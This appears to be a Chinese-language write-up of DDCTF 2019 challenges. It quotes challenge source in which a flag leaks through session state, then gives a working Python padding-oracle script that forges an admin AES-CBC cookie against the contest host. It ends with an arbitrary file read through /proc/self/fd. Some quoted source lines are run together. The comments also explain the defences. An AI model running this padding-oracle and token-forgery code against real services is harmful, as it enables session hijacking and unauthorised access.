def view_handler(args):
    """Render one page of the shop UI ('index', 'shop' or 'reset') as an HTML fragment.

    args[0] names the page. Every page starts with the current counters read
    from the ``session`` mapping (defined elsewhere in the app). The 'reset'
    page additionally deletes ``session['num_items']`` as a side effect.
    Returns the HTML string; an unknown page yields only the counter line.
    """
    page = args[0]
    # Only static markup plus the two session counters are interpolated here;
    # nothing request-controlled is inserted into the markup in this function.
    parts = [
        '[INFO] you have {} diamonds, {} points now.<br />'.format(
            session['num_items'], session['points'])
    ]
    if page == 'index':
        parts.append('<a href="./?action:index;True%23False">View source code</a><br />')
        parts.append('<a href="./?action:view;shop">Go to e-shop</a><br />')
        parts.append('<a href="./?action:view;reset">Reset</a><br />')
    elif page == 'shop':
        parts.append('<a href="./?action:buy;1">Buy a diamond (1 point)</a><br />')
    elif page == 'reset':
        # The counter line above was already built, so the value is read
        # before it is dropped; re-initialisation happens elsewhere.
        del session['num_items']
        parts.append('Session reset.<br />')
        parts.append('<a href="./?action:view;index">Go back to index.html</a><br />')
    return ''.join(parts)
source = open('eventLoop.py', 'r') html = '' if bool_download_source != 'True': html += '<a href="./?action:index;True%23True">Download this .py file</a><br />' html += '<a href="./?action:view;index">Go back to index.html</a><br />'
for line in source: if bool_download_source != 'True': html += line.replace('&','&').replace('\t', ' '*4).replace(' ',' ').replace('<', '<').replace('>','>').replace('\n', '<br />') else: html += line source.close()
def show_flag_function(args):
    """Handler for the 'func:show_flag' event; returns a fixed taunt, never the flag.

    args[0] is the flag string passed along by get_flag_handler. The original
    ``return flag`` is disabled, so the argument is received but unused.
    """
    flag = args[0]
    # #return flag -- GOTCHA! We noticed that here is a backdoor planted by a
    # hacker which will print the flag, so we disabled it. Note that disabling
    # the output here does not affect what happened to the flag value before
    # this handler was invoked.
    return 'You naughty boy! ;) <br />'
def get_flag_handler(args):
    """Queue the show_flag event when the session holds 5+ diamonds, then redirect to index.

    args is unused. Reads ``session['num_items']``; with five or more it
    queues a 'func:show_flag' event carrying FLAG(), and in every case queues
    the 'action:view;index' event afterwards. Returns None; all effects go
    through trigger_event (defined elsewhere).
    """
    has_enough_items = session['num_items'] >= 5
    if has_enough_items:
        # show_flag_function has been disabled, no worries
        # NOTE(review): FLAG() is concatenated into the event string before the
        # (disabled) handler ever runs. trigger_event is not shown here; the
        # writeup below recovers the flag by decoding the session cookie, which
        # suggests pending events are persisted in client-readable session
        # state. Disabling the handler's output does not remove the secret from
        # that state -- keep secrets out of anything sent to the client.
        trigger_event('func:show_flag;' + FLAG())
    trigger_event('action:view;index')
if __name__ == "__main__":
    # Listen on all interfaces (container-style deployment) with the interactive
    # debugger kept off; `app` is defined elsewhere in the file.
    app.run(host='0.0.0.0', debug=False)
getflag 的方法很明确,就是弄到五颗以上钻石,然后调用 get_flag_handler ,最后再解码 cookie 就能拿到 flag 了。
# Token forgery against an unauthenticated AES-CBC cookie (Python 2 script).
# c_final11 / c_final2 are the per-block "intermediate" values (block output of
# the cipher before the XOR with the previous block) recovered by the padding
# oracle loop further down; c_final2 is presumably obtained the same way for the
# second block (that run is not shown). Because the token carries no MAC, XORing
# a chosen plaintext into those values produces an IV / ciphertext block that
# decrypts to attacker-chosen bytes without knowing the key.
# Defender's view: authenticated encryption (AES-GCM, or encrypt-then-MAC checked
# before any decryption) makes every modified token fail closed.
url = "http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/api/account_info"
# The token value under attack, base64-decoded; the commented lines below show
# the author's split into a 16-byte IV and a 16-byte ciphertext block.
data = base64.b64decode("UGFkT3JhY2xlOml2L2NiY8O+7uQmXKFqNVUuI9c7VBe42FqRvernmQhsxyPnvxaF")
# iv = data[:16]
# c = data[16:32]
# Forge the IV so that the first 16 plaintext bytes become the chosen JSON prefix.
IV = ""
i_need = '{"id":100,"roleA'
for x in range(16):
    IV += chr(ord(c_final11[x]) ^ ord(i_need[x]))
# Same for the second block: 11 bytes of JSON plus five 0x05 bytes so the block
# ends in valid PKCS#7-style padding (otherwise the server reports a decrypt error).
c = ""
i_need = 'dmin":true}' + 5 * "\x05"
for x in range(16):
    c += chr(ord(c_final2[x]) ^ ord(i_need[x]))
# Python 2 print statement; the tail of the original token is reused unchanged.
print base64.b64encode(IV + c + data[32:])
# Stop here: the code below is the earlier recovery stage, kept for reference.
exit(1)
# Padding Oracle
# The only information the server leaks is whether the decrypted block had valid
# padding ("decrypt err" or not). That single bit per request is enough: the
# loop walks the block from its last byte (x == 1) to its first (x == 16),
# trying up to 256 values per byte, so the 16-byte intermediate state is
# recovered in at most 16 * 256 requests. The distinguishable error is the
# defect; return one uniform failure for every bad token and verify a MAC
# before decrypting.
for x in xrange(1, 17):
    for y in xrange(0, 256):
        # Candidate IV: zeros, the byte under test, then the already-recovered
        # suffix XORed with the padding value x so those bytes decrypt to x.
        IV = "\x00" * (16 - x) + chr(y) + "".join(chr(ord(i) ^ x) for i in c_final11)
        # `c` is the ciphertext block being attacked, set up outside this snippet.
        payload = base64.b64encode(IV + c)
        headers = {
            "Accept": "application/json, text/plain, */*",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.9",
            "Connection": "keep-alive",
            "Cookie": "token=" + payload,
            "Host": "c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023",
            "Referer": "http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/home",
            # The trailing "" is an adjacent empty literal (implicit
            # concatenation) -- a paste artifact with no effect on the value.
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"""
        }
        # `myd` is the HTTP client, defined elsewhere (presumably a requests
        # session given .get(...).content -- not shown).
        result = myd.get(url, headers=headers).content
        if "decrypt err" not in result:
            # Padding accepted: the intermediate byte is y ^ x; prepend it.
            c_final11 = chr(y ^ x) + c_final11
            print "[+]Get: " + urllib.quote(c_final11)
            break
        if y == 255:
            # No candidate accepted for this position; the oracle assumption failed.
            print "[!]Error!"
            exit(1)
print urllib.quote(c_final11)
# for x in xrange(16):
#     m += chr(ord(c_final11[x]) ^ ord(iv[x]))
# print m
# print urllib.quote(m)
exit(1)
修改 cookie ,成为 admin 后看到一个下载链接,这里有一个任意文件下载漏洞。
文件读取
下载到一个 1.txt ,提示说:
Try to hack~ Hint: 1. Env: Springboot + JDK8(openjdk version "1.8.0_181") + Docker~ 2. You can not exec commands~
坑,利用文件读取漏洞,跑字典可以在 /proc/self/fd/15 处下载到一个 zip ,里面就是题目的源码。